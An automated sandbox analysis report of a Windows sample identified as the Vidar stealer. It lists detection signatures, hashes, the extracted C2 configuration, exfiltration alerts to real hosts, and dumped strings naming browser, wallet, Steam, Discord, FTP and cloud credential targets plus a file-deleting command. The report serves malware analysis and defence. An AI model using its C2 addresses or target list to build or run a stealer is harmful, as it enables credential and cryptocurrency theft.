Windows Analysis Report
x9Lh8czsmo.exe

Overview

General Information

Sample name: x9Lh8czsmo.exe
renamed because original name is a hash value
Original sample name: b2866657421dc1115cb70555c84da220dececce78879b800a8ca79fddfba993c.exe
Analysis ID: 1597386
MD5: 4de25ac5b7602cb6b41bba4282e6a002
SHA1: 1cfe4a7735ee81515b0b44e9a901642a52c51c36
SHA256: b2866657421dc1115cb70555c84da220dececce78879b800a8ca79fddfba993c
Tags: exevidaruser-Lars
Infos:

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Vidar stealer
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Monitors registry run keys for changes
Searches for specific processes (likely to inject)
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

AV Detection

barindex
Source: 00000002.00000002.1986442365.0000000000400000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199819539662", "Botnet": "go2dniz"}
Source: x9Lh8czsmo.exe ReversingLabs: Detection: 52%
Source: x9Lh8czsmo.exe Virustotal: Detection: 43% Perma Link
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: x9Lh8czsmo.exe Joe Sandbox ML: detected
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00405FE7 CryptUnprotectData,LocalAlloc,LocalFree, 2_2_00405FE7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0040E7E9 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,GetLastError,GetProcessHeap,HeapFree, 2_2_0040E7E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00406062 BCryptCloseAlgorithmProvider,BCryptDestroyKey, 2_2_00406062
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0040627F LocalAlloc,BCryptDecrypt, 2_2_0040627F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0040609C BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey, 2_2_0040609C
Source: x9Lh8czsmo.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49741 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 88.99.120.106:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: x9Lh8czsmo.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: vdr1.pdb source: x9Lh8czsmo.exe, 00000000.00000002.1426071903.0000000002EB5000.00000004.00000800.00020000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003B84000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 00000002.00000002.1986442365.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: A{"id":1,"method":"Storage.getCookies"}|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2:22.ps15121Windows 11HTTP/1.1HARDWA
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: x9Lh8czsmo.exe, 00000000.00000002.1443815308.0000000005D60000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: x9Lh8czsmo.exe, 00000000.00000002.1443815308.0000000005D60000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003A35000.00000004.00000800.00020000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1443465612.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003B0C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003A35000.00000004.00000800.00020000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1443465612.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp, x9Lh8czsmo.exe, 00000000.00000002.1440562957.0000000003B0C000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00413C71 SHGetFolderPathA,wsprintfA,FindFirstFileA,FindNextFileA,strcpy,_splitpath,strcpy,strlen,isupper,wsprintfA,strcpy,strlen,SHFileOperationA,FindNextFileA,FindNextFileA,FindClose, 2_2_00413C71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_004112E8 wsprintfA,FindFirstFileA,memset,memset,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,SymMatchString,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 2_2_004112E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00407891 FindFirstFileA,CopyFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,FindNextFileA,FindClose, 2_2_00407891
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0040A69C FindFirstFileA,StrCmpCA,CopyFileA,Sleep,DeleteFileA,FindNextFileA,FindClose, 2_2_0040A69C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00408776 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 2_2_00408776
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00411D33 wsprintfA,FindFirstFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 2_2_00411D33
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_004013DA FindFirstFileA,FindNextFileA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindNextFileA,FindClose, 2_2_004013DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00406784 ExpandEnvironmentStringsA,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,StrCmpCA,CopyFileA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 2_2_00406784
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00412BBE wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_00412BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00409C78 wsprintfA,FindFirstFileA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 2_2_00409C78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00408224 FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 2_2_00408224
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_0041269A GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 2_2_0041269A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00411883 SymMatchString,SymMatchString,SymMatchString,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA, 2_2_00411883
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 0_2_05C9D3C0
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 4x nop then jmp 05D20AA0h 0_2_05D2069A
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 4x nop then jmp 05D20AA0h 0_2_05D206A8
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 4x nop then jmp 05D2104Ch 0_2_05D20E38
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 4x nop then jmp 05D2104Ch 0_2_05D20E28
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 4x nop then jmp 05ED3E38h 0_2_05ED3D80
Source: C:\Users\user\Desktop\x9Lh8czsmo.exe Code function: 4x nop then jmp 05ED3E38h 0_2_05ED3D79
Source: chrome.exe Memory has grown: Private usage: 7MB later: 39MB

Networking

barindex
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49714 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.8:49712 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.8:49708 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49713 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49734 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49740 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49740 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49742 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49742 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 88.99.120.106:443 -> 192.168.2.8:49712
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49743 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49738 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49738 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 88.99.120.106:443 -> 192.168.2.8:49710
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49775 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49788 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49788 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49785 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49785 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49786 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49786 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49789 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49789 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49787 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49787 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49793 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.8:49790 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.8:49790 -> 88.99.120.106:443
Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199819539662
Source: global traffic HTTP traffic detected: GET /sc1phell HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: Joe Sandbox View IP Address: 2.23.209.13 2.23.209.13
Source: Joe Sandbox View IP Address: 13.107.246.45 13.107.246.45
Source: Joe Sandbox View IP Address: 18.244.18.27 18.244.18.27
Source: Joe Sandbox View JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown HTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49741 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 2_2_00403C79 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 2_2_00403C79
Source: global traffic HTTP traffic detected: GET /sc1phell HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: tlfiyat.shopConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIk6HLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIk6HLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIk6HLAQiFoM0BCLnKzQEIitPNARjBy8wBGMXYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
